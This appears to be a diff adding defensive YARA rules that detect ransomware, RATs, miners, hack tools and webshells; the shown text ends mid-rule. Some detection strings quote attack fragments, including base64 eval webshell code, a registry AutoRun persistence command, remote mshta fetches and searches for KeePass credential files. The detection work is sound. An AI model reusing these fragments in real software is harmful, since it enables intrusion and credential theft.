+      uint16 ( 0 ) == 0x5a4d and pe.imphash ( ) == "f86dec4a80961955a89e7ed62046cc0e"
+}
+
+rule SUSP_RAR_with_PDF_Script_Obfuscation_RID34A4 : DEMO FILE OBFUS SCRIPT SUSP {
+   meta:
+      description = "Detects RAR file with suspicious .pdf extension prefix to trick users"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-04-06 15:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b629b46b009a1c2306178e289ad0a3d9689d4b45c3d16804599f23c90c6bca5b"
+      tags = "DEMO, FILE, OBFUS, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".pdf.vbe" ascii
+      $s2 = ".pdf.vbs" ascii
+      $s3 = ".pdf.ps1" ascii
+      $s4 = ".pdf.bat" ascii
+      $s5 = ".pdf.exe" ascii
+   condition: 
+      uint32 ( 0 ) == 0x21726152 and 1 of them
+}
+
+rule HKTL_Keyword_InjectDLL_RID2F20 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects suspicious InjectDLL keyword found in hacktools or possibly unwanted applications"
+      author = "Florian Roth"
+      reference = "https://github.com/zerosum0x0/koadic"
+      date = "2019-04-04 11:43:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2e7b4141e1872857904a0ef2d87535fd913cbdd9f964421f521b5a228a492a29"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "InjectDLL" fullword ascii
+      $s4 = "Kernel32.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and all of them
+}
+
+rule SUSP_Just_EICAR_RID2C24 : DEMO FILE SUSP {
+   meta:
+      description = "Just an EICAR test file - this is boring stuff"
+      author = "Florian Roth"
+      reference = "http://2016.eicar.org/85-0-Download.html"
+      date = "2019-03-24 09:36:31"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x3558 and filesize < 70 and $s1 at 0
+}
+
+rule Ransom_LockerGoga_Mar19_1_RID3037 : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects LockerGoga ransomware binaries"
+      author = "Florian Roth"
+      reference = "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202"
+      date = "2019-03-19 12:30:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15"
+      hash2 = "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26"
+      hash3 = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\.(doc|dot|wbk|docx|dotx|docb|xlm|xlsx|xltx|xlsb|xlw|ppt|pot|pps|pptx|potx|ppsx|sldx|pdf)" wide
+      $x2 = "|[A-Za-z]:\\cl.log" wide
+      $x4 = "\\crypto-locker\\" ascii
+      $xc1 = { 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E
+               00 61 00 6D 00 65 00 00 00 00 00 4D 00 6C 00 63
+               00 72 00 6F 00 73 00 6F 00 66 00 74 } 
+      $xc2 = { 00 2E 00 6C 00 6F 00 63 00 6B 00 65 00 64 00 00
+               00 20 46 41 49 4C 45 44 20 00 00 00 00 20 00 00
+               00 20 75 6E 6B 6E 6F 77 6E 20 65 78 63 65 70 74
+               69 6F 6E } 
+      $rn1 = "This may lead to the impossibility of recovery of the certain files." wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) ) or $rn1
+}
+
+rule MAL_CMD_Script_Obfuscated_Feb19_1_RID32B7 : DEMO FILE MAL OBFUS SCRIPT T1064 {
+   meta:
+      description = "Detects obfuscated batch script using env variable sub-strings"
+      author = "Florian Roth"
+      reference = "https://twitter.com/DbgShell/status/1101076457189793793"
+      date = "2019-03-01 14:17:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "deed88c554c8f9bef4078e9f0c85323c645a52052671b94de039b438a8cff382"
+      tags = "DEMO, FILE, MAL, OBFUS, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = { 40 65 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 } 
+      $s1 = { 2C 31 25 0D 0A 65 63 68 6F 20 25 25 } 
+   condition: 
+      uint16 ( 0 ) == 0x6540 and filesize < 200KB and $h1 at 0 and uint16 ( filesize - 3 ) == 0x0d25 and uint8 ( filesize - 1 ) == 0x0a and $s1 in ( filesize - 200 .. filesize )
+}
+
+rule MAL_PE_Type_BabyShark_Loader_RID316C : APT DEMO EXE FILE MAL T1112 {
+   meta:
+      description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
+      author = "Florian Roth"
+      reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
+      date = "2019-02-24 13:21:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1112"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
+      $x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/ 
+      $xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
+               2E 44 4C 4C 00 00 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( pe.imphash ( ) == "57b6d88707d9cd1c87169076c24f962e" or 1 of them or for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "thawte SHA256 Code Signing CA" and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" ) )
+}
+
+rule HKTL_Dsniff_RID2AFD : APT DEMO HKTL {
+   meta:
+      description = "Detects Dsniff hack tool"
+      author = "Florian Roth"
+      reference = "https://goo.gl/eFoP4A"
+      date = "2019-02-19 08:47:21"
+      score = 55
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*" 
+   condition: 
+      1 of them
+}
+
+rule APT_WebShell_Tiny_1_RID2DFE : APT DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 10:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "eval(" ascii wide
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c or uint16 ( 0 ) == 0x253c ) and filesize < 40 and $x1
+}
+
+rule APT_WebShell_AUS_Tiny_2_RID2F47 : APT DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 11:50:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
+      tags = "APT, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
+      $x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3f3c or uint16 ( 0 ) == 0x253c ) and filesize < 1KB and 1 of them
+}
+
+rule APT_WebShell_AUS_JScript_3_RID3063 : APT DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 12:37:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
+      tags = "APT, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
+      $s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
+   condition: 
+      uint16 ( 0 ) == 0x6568 and filesize < 1KB and all of them
+}
+
+rule APT_WebShell_AUS_4_RID2D46 : APT DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 10:24:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
+      tags = "APT, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
+      $s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
+      $s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
+      $s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x7566 and filesize < 10KB and 3 of them
+}
+
+rule APT_Script_AUS_4_RID2CA5 : APT DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a script involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 09:58:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
+      tags = "APT, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
+      $x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
+      $x3 = "Dim mmpath As String, newmmpath  As String, appdataPath As String" fullword ascii
+      $x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
+      $x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
+      $x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
+   condition: 
+      filesize < 7KB and 1 of them
+}
+
+rule APT_WebShell_AUS_5_RID2D47 : APT DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 10:25:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
+      tags = "APT, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
+      $a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
+      $s1 = "var hash=DEC(Request.Item['" ascii
+      $s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
+      $s3 = "hashtable[hash] = assCode;" fullword ascii
+      $s4 = "Response.Write(ss);" fullword ascii
+      $s5 = "var hashtable = Application[CachePtr];" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x7566 and filesize < 2KB and 4 of them
+}
+
+rule HKTL_PowerKatz_Feb19_1_RID2EB0 : DEMO HKTL {
+   meta:
+      description = "Detetcs a tool used in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 11:25:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Powerkatz32" ascii wide fullword
+      $x2 = "Powerkatz64" ascii wide
+      $s1 = "GetData: not found taskName" fullword ascii wide
+      $s2 = "GetRes Ex:" fullword ascii wide
+   condition: 
+      1 of ( $x* ) and 1 of ( $s* )
+}
+
+rule HKTL_Unknown_Feb19_1_RID2DF9 : DEMO HKTL {
+   meta:
+      description = "Detetcs a tool used in the Australian Parliament House network compromise"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+      date = "2019-02-18 10:54:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "not a valid timeout format!" ascii wide fullword
+      $x2 = "host can not be empty!" ascii wide fullword
+      $x3 = "not a valid port format!" ascii wide fullword
+      $x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
+      $x5 = "ping count is not a correct format!" ascii wide fullword
+      $s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
+      $s2 = "C:\\Windows\\temp\\" ascii wide
+   condition: 
+      1 of ( $x* ) or 2 of them
+}
+
+rule SUSP_EnableContent_String_Gen_RID322C : DEMO FILE GEN OFFICE SUSP T1193 T1203 {
+   meta:
+      description = "Detects suspicious string that asks to enable active content in Office Doc"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-02-12 13:53:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
+      tags = "DEMO, FILE, GEN, OFFICE, SUSP, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $e1 = "Enable Editing" fullword ascii
+      $e2 = "Enable Content" fullword ascii
+      $e3 = "Enable editing" fullword ascii
+      $e4 = "Enable content" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and ( $e1 in ( 0 .. 3000 ) or $e2 in ( 0 .. 3000 ) or $e3 in ( 0 .. 3000 ) or $e4 in ( 0 .. 3000 ) or 2 of them )
+}
+
+rule SUSP_WordDoc_VBA_Macro_Strings_RID323F : DEMO FILE MAL OFFICE SCRIPT SUSP T1193 T1203 {
+   meta:
+      description = "Detects suspicious strings in Word Doc that indcate malicious use of VBA macros"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-02-12 13:57:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
+      tags = "DEMO, FILE, MAL, OFFICE, SCRIPT, SUSP, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "\\Microsoft Shared\\" ascii
+      $a2 = "\\VBA\\" ascii
+      $a3 = "Microsoft Office Word" fullword ascii
+      $a4 = "PROJECTwm" fullword wide
+      $s1 = "AppData" fullword ascii
+      $s2 = "Document_Open" fullword ascii
+      $s3 = "Project1" fullword ascii
+      $s4 = "CreateObject" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 800KB and all of them
+}
+
+rule MAL_ExileRAT_Feb19_1_RID2D8E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Exile RAT"
+      author = "Florian Roth"
+      reference = "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
+      date = "2019-02-04 10:36:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
+      $s1 = "syshost.dll" fullword ascii
+      $s2 = "\\scout\\Release\\scout.pdb" ascii
+      $s3 = "C:\\data.ini" fullword ascii
+      $s4 = "my-ip\" value=\"" fullword ascii
+      $s5 = "ver:%d.%d.%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "da8475fc7c3c90c0604ce6a0b56b5f21" or 3 of them )
+}
+
+rule SUSP_Katz_PDB_RID2B8A : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects suspicious PDB in file"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-02-04 09:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6888ce8116c721e7b2fc3d7d594666784cf38a942808f35e309a48e536d8e305"
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $s1 = /\\Release\\[a-z]{0,8}katz.pdb/ 
+      $s2 = /\\Debug\\[a-z]{0,8}katz.pdb/ 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+}
+
+rule PUA_CryptoMiner_Jan19_1_RID2F44 : DEMO MAL {
+   meta:
+      description = "Detects Crypto Miner strings"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-01-31 11:49:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Stratum notify: invalid Merkle branch" fullword ascii
+      $s2 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+      $s3 = "User-Agent: cpuminer/" ascii
+      $s4 = "hash > target (false positive)" fullword ascii
+      $s5 = "thread %d: %lu hashes, %s khash/s" fullword ascii
+   condition: 
+      filesize < 1000KB and 1 of them
+}
+
+rule APT_MAL_DNS_Hijacking_Campaign_AA19_024A_RID345A : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in DNS Hijackign campaign"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
+      date = "2019-01-25 15:26:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+      hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "/Client/Login?id=" fullword ascii
+      $s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+      $s4 = ".\\Configure.txt" fullword ascii
+      $s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
+      $s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule SUSP_RTF_Header_Anomaly_RID2F7F : ANOMALY DEMO FILE SUSP {
+   meta:
+      description = "Detects malformed RTF header often used to trick mechanisms that check for a full RTF header"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ItsReallyNick/status/975705759618158593"
+      date = "2019-01-20 11:59:41"
+      score = 55
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-09-15"
+      tags = "ANOMALY, DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   condition: 
+      uint32 ( 0 ) == 0x74725c7b and not uint8 ( 4 ) == 0x66
+}
+
+rule Webshell_Tiny_ASP_Jan19_1_RID2FFF : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects a Tiny ASP webshell"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-01-16 12:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ddcae07ec497ea43ed38fcd6379b2a35776bc2e45b8c5b0267310e92ba3b30cc"
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Execute Request" ascii wide nocase
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 150 and 1 of them
+}
+
+rule MAL_CrypRAT_Jan19_1_RID2D41 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects CrypRAT"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-01-07 10:24:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Cryp_RAT" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "2524e5e9fe04d7bfe5efb3a5e400fe4b" or 1 of them )
+}
+
+rule SUSP_Putty_Unnormal_Size_RID3086 : ANOMALY DEMO EXE FILE MAL SUSP T1021 T1021_004 T1572 {
+   meta:
+      description = "Detects a putty version with a size different than the one provided by Simon Tatham (could be caused by an additional signature or malware)"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-01-07 12:43:31"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-06-30"
+      hash1 = "e5e89bdff733d6db1cffe8b3527e823c32a78076f8eadc2f9fd486b74a0e9d88"
+      hash2 = "ce4c1b718b54973291aefdd63d1cca4e4d8d4f5353a2be7f139a290206d0c170"
+      hash3 = "adb72ea4eab7b2efc2da6e72256b5a3bb388e9cdd4da4d3ff42a9fec080aa96f"
+      tags = "ANOMALY, DEMO, EXE, FILE, MAL, SUSP, T1021, T1021_004, T1572"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SSH, Telnet and Rlogin client" fullword wide
+      $v1 = "Release 0.6" wide
+      $v2 = "Release 0.70" wide
+      $fp1 = "KiTTY fork" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $s1 and 1 of ( $v* ) and not 1 of ( $fp* ) and filesize != 524288 and filesize != 495616 and filesize != 483328 and filesize != 524288 and filesize != 712176 and filesize != 828400 and filesize != 569328 and filesize != 454656 and filesize != 531368 and filesize != 524288 and filesize != 483328 and filesize != 713592 and filesize != 829304 and filesize != 571256 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 640000 and filesize != 650720 and filesize != 662808 and filesize != 651256 and filesize != 664432
+}
+
+rule SUSP_JAVA_Class_with_VBS_Content_RID32D1 : DEMO FILE SCRIPT SUSP {
+   meta:
+      description = "Detects a JAVA class file with strings known from VBS files"
+      author = "Florian Roth"
+      reference = "https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies"
+      date = "2019-01-03 14:21:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e0112efb63f2b2ac3706109a233963c19750b4df0058cc5b9d3fa1f1280071eb"
+      tags = "DEMO, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "java/lang/String" ascii
+      $s1 = ".vbs" ascii
+      $s2 = "createNewFile" fullword ascii
+      $s3 = "wscript" fullword ascii nocase
+   condition: 
+      uint16 ( 0 ) == 0xfeca and filesize < 100KB and $a1 and 3 of ( $s* )
+}
+
+rule SUSP_XMRIG_String_RID2D18 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects a suspicious XMRIG crypto miner executable string in filr"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-12-28 10:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "xmrig.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule APT_APT10_Malware_Imphash_Dec18_1_RID3250 : APT CHINA DEMO EXE FILE G0045 MAL {
+   meta:
+      description = "Detects APT10 malware based on ImpHashes"
+      author = "Florian Roth"
+      reference = "AlienVault OTX IOCs - statistical sample analysis"
+      date = "2018-12-28 13:59:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0045, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and ( pe.imphash ( ) == "0556ff5e5f8744bff47d4921494ba46d" or pe.imphash ( ) == "cb1194123f68a68eb14552c085b620ce" or pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "a5d0545030be75a421529c2b0be6c4bd" or pe.imphash ( ) == "94491f4a812b0297419dc888aa4fd2a5" )
+}
+
+rule HKTL_NoPowerShell_RID2D65 : DEMO HKTL {
+   meta:
+      description = "Detects NoPowerShell hack tool"
+      author = "Florian Roth"
+      reference = "https://github.com/bitsadmin/nopowershell"
+      date = "2018-12-28 10:30:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\NoPowerShell.pdb" ascii
+      $x2 = "Invoke-WmiMethod -Class Win32_Process -Name Create \"cmd" fullword wide
+      $x3 = "ls C:\\Windows\\System32 -Include *.exe | select -First 10 Name,Length" fullword wide
+      $x4 = "ls -Recurse -Force C:\\Users\\ -Include *.kdbx" fullword wide
+      $x5 = "NoPowerShell.exe" fullword wide
+   condition: 
+      1 of them
+}
+
+rule SUSP_Obfuscted_PowerShell_Code_RID3298 : DEMO OBFUS SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Detects obfuscated PowerShell Code"
+      author = "Florian Roth"
+      reference = "https://twitter.com/silv0123/status/1073072691584880640"
+      date = "2018-12-13 14:11:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, OBFUS, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "').Invoke(" ascii
+      $s2 = "(\"{1}{0}\"" ascii
+      $s3 = "{0}\" -f" ascii
+   condition: 
+      #s1 > 11 and #s2 > 10 and #s3 > 10
+}
+
+rule SUSP_Modified_SystemExeFileName_in_File_RID35F8 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detecst a variant of a system file name often used by attackers to cloak their activity"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+      date = "2018-12-11 16:35:51"
+      score = 65
+      customer = "demo"
